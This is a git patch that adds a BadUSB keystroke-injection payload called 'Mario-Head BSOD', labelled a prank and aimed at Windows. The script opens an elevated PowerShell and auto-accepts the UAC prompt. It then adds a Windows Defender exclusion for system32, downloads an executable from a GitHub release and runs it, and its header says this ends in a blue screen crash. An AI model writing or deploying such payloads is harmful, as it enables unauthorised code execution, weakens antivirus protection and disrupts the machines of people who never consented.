From 4cca9e6256e551ab053b5b09387c1868dd6aac91 Mon Sep 17 00:00:00 2001 From: FalsePhilosopher Date: Sat, 30 Jul 2022 21:35:32 -0600 Subject: [PATCH] added mario-head PL --- BadUSB/Mario-head.txt | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 BadUSB/Mario-head.txt diff --git a/BadUSB/Mario-head.txt b/BadUSB/Mario-head.txt new file mode 100644 index 00000000..1d839713 --- /dev/null +++ b/BadUSB/Mario-head.txt @@ -0,0 +1,22 @@ +REM Title: Mario-Head BSOD +REM Author: FalsePhilosopher +REM Target: Windows 7 and up 32/64 bit +REM Props: Hak5, bemxio for creating mario-head https://github.com/bemxio/mario-head, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes +REM Version: 1.0 +REM Category: Prank +REM Display a video of Mario's levitating head asking if he can have your computer and invokes a BSOD. +REM +REM startup delay +DELAY 300 +GUI r +DELAY 500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 3000 +ALT y +DELAY 2000 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32 +ENTER +DELAY 1500 +STRING $down = New-Object System.Net.WebClient; $url = 'https://github.com/bemxio/mario-head/releases/latest/download/mario_dist.exe'; $file = 'mario_dist.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; +ENTER